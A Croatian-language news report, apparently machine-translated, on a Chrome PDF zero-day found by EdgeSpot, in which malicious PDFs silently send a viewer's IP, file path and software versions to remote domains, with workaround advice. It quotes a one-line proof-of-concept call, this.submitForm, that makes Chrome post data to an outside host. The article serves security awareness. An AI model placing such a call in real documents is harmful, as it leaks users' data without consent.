Služba za otkrivanje iskorištavanja EdgeSpot otkrio je intrigantnu Chromovu ranjivost bez ijednog dana iskorištavajući PDF dokumente. Ranjivost omogućuje napadačima prikupljanje osjetljivih podataka koristeći zlonamjerne PDF dokumente otvorene u Chromeu.

Čim žrtva otvori odgovarajuće PDF datoteke u pregledniku Google Chrome, u pozadini započinje zlonamjerni program prikupljanjem korisničkih podataka.

Podaci se zatim prosljeđuju na udaljeni poslužitelj koji kontroliraju hakeri. Možda se pitate koje podatke napadači napadaju, a ciljaju sljedeće podatke na računalu:

• IP adresa
• Potpuni put PDF datoteke u sustav
• Verzije OS-a i Chrome-a

Pazite na PDF datoteke opuštene zlonamjernim softverom

Možda ćete biti iznenađeni kada znate da se ništa ne događa kada se Adobe Reader koristi za otvaranje PDF datoteka. Uz to, HTTP POST zahtjevi koriste se za prijenos podataka na udaljene poslužitelje bez ikakve intervencije korisnika.

Stručnjaci su primijetili da je podatke dobivala jedna od dvije domene readnotifycom ili burpcollaboratornet.

Možete zamisliti intenzitet napada uzimajući u obzir činjenicu da većina antivirusnog softvera ne može otkriti uzorke koje je otkrio EdgeSpot.

Stručnjaci otkrivaju da napadači koriste PDF JavaScript Javascript API "this.submitForm ()" kako bi prikupili osjetljive podatke korisnika.

Testirali smo ga s minimalnim PoC, jednostavnim API pozivom poput „this.submitForm („ http://google.com/test “)“ Google Chrome će poslati osobne podatke na google.com.

Stručnjaci su zapravo otkrili da ovu Chrome grešku koriste dva različita skupa zlonamjernih PDF datoteka. Obojica su distribuirana u listopadu 2017. i rujnu 2018. godine.

Značajno je da prikupljeni podaci napadači mogu koristiti za podešavanje napada u budućnosti. Izvješća sugeriraju da je prva skupina datoteka sastavljena pomoću usluge praćenja PDF-a ReadNotify.

Korisnici mogu koristiti uslugu za praćenje pregleda korisnika. EdgeSpot nije podijelio nikakve detalje u vezi s prirodom drugog skupa PDF datoteka.

Kako ostati zaštićen

Usluga otkrivanja Exploita EdgeSpot željela je upozoriti korisnike Chromea o potencijalnim rizicima jer se ne očekuje da će se patch izdati u skoroj budućnosti.

EdgeSpot je prošle godine izvijestio Google o ranjivosti, a kompanija je obećala objaviti zakrpu krajem travnja. H

Međutim, možete razmotriti korištenje privremenog rješenja problema lokalnim pregledom primljenih PDF dokumenata pomoću alternativne aplikacije PDF čitač.

Možete i otvoriti svoje dokumente PDF-a u Chromeu tako da prekinete vezu s Internetom. U međuvremenu, možete pričekati ažuriranje Chrome 74 za koje se očekuje da će biti predstavljeno 23. travnja.